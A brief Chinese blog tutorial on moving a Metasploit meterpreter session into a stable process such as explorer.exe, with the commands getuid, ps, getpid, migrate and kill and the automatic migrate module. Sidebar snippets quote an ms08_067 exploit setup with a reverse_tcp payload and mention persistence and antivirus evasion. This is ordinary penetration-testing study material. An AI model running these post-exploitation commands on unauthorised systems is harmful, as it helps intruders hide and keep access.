msf进程迁移

最新推荐文章于 2023-09-21 21:15:54 发布
最新推荐文章于 2023-09-21 21:15:54 发布
阅读量3.5k 收藏 8
点赞数
分类专栏: 笔记 文章标签: msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44881113/article/details/120199236
版权

在msf拿到会话后
在这里插入图片描述

getuid #查看当前用户 

ps #获取目标主机正在运行的进程

在这里插入图片描述

getpid #查看meterpreter shell的进程号

在这里插入图片描述
然后使用migrate 1692命令将shell移到PID为1692的explorer.exe进程里,因为该进程是一个稳定的应用。
在这里插入图片描述

migrate 1692 #迁移进程

在这里插入图片描述
再次查看进程发现已经改变
在这里插入图片描述
进程迁移后 原来的pid的2496会自动关闭,如果没有关闭输入 kill 2496 关闭进程

kill 2496 #关闭进程

run post/windows/manage/migrate #自动迁移进程

在这里插入图片描述

金色的天空
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MSF技术总结
05-07
* migrate:迁移会话 * kill:杀死进程 * upload:上传文件 * download:下载文件 MSF 是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文对 MSF 的...
关于metasploit的木马免杀,维持权限以及进程迁移
m0_46682482的博客
07-22 2275
hi,大家好,我是铁汉fhoenix。这里我为各位总结一下msf的免杀,维持以及进程迁移。 1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。 2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/mete.
Msf 进程迁移和自动化迁移指定进程
dongxieaitonglao的博客
03-17 1694
meterpreter作为一个进程时容易被清除,如果将它和系统经常运行的进程进行绑定,就能够实现持久化 1.进程迁移 在Meterpreter下输入ps(获取目标机正在运行的进程,记住目标进程的pid xxxx) 输入getpid命令(查看meterpreter shell的pid调到XXXX里相对稳定应用的进程里) 输入migrate xxxx (将meterpreter shell的pid调到xxxx里相对稳定应用的进程里) 最后用getid再次查看下是否更换成公 2.上线后自动化迁移指定进程 在se
安全攻防实战系列MSF
kali_Ma的博客
12-06 2333
前言 在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobalt strike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并截图证明。 环境配置 从虚拟机网络来看 机器描述 攻击机: win10:192.168.1.6 kali:192.168.1.10 第一层:12server-bt: 192.168.1.5 192.168.59.133 第
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5578
meterpreter使用攻略(持续更新中)
Metasploit技术(四)——进程迁移
Phantom03167的博客
04-11 4876
后渗透攻击 进程迁移
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
kali 渗透msf
11-14
kali渗透测试利器
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
msf命令全集
06-05
MSF 命令全集 MSF(Metasploit Framework)是一款功能强大且功能丰富的渗透测试工具,提供了多种命令来实现各种功能。下面是 MSF 命令全集的详细解释: 基本命令 * `?`:帮助菜单,显示所有可用的命令 * `back`:...
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 4721
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
msf联动cs
hmysn的博客
12-31 2111
Cobalt Strike简称CS 用于团队作战使用,由一个服务端和多个客户端组成,能让多个攻击者这在一个团队服务器上共享目标资源和信息,我们在使用msf获得权限以后,可以将信息共享到cs上,使用cs来进行监听以及其他的操作。
cobaltstrike攻击流程,联动msf之socks代理
cc777777777的博客
05-15 1024
cobaltstrike攻击流程,联动msf之socks代理
内网渗透 Metasploit(MSF)基础使用
热门推荐
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF)使用,信息搜集,模块详解,端口扫描,反弹shell
metasploit迁移进程
天元喜羊羊的博客
04-27 3321
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
WEB安全:深入反射式dll注入技术
2301_76694151的博客
05-16 853
通过调用CreateRemoteThread()/NtCreateThread()/RtlCreateUserThread()函数在被注入进程创建线程进行dll注入。通过调用QueueUserAPC()/SetThreadContext()函数来劫持被注入进程已存在的线程加载dll。通过调用SetWindowsHookEx()函数来设置拦截事件,在发生对应的事件时,被注入进程执行拦截事件函数加载dll。获取被注入进程PID。在注入进程的访问令牌中开启SE_DEBUG_NAME权限。
MSF学习笔记(11)
Shadow 爬爬记
02-12 925
本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf ...
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
最新发布
weoptions的博客
09-21 4365
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
msf升级shell
08-06
根据引用和引用中的信息,要在Metasploit Framework (MSF)中升级shell,可以按照以下步骤进行操作: 1. 首先,确保已经建立了与目标主机的连接,并且已经获取到了一个正常的shell会话。 2. 使用命令sessions -u [会话ID将shell升级为meterpreter shell。这样可以将MSF会话派生到Cobalt Strike (CS)。 3. 接下来,可以将MSF中的会话派生给CS。具体步骤如下: a. 进入到Cobalt Strike的上下文中。 b. 使用命令migrate [目标进程ID将shell移动到指定的进程中。例如,可以使用命令migrate448将shell迁移进程ID为448的进程中。 c. 输入getpid命令来确认shell已经成功迁移到目标进程中。 这样,你就成功地将MSF中的shell升级到了meterpreter shell,并将其派生到了Cobalt Strike会话中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值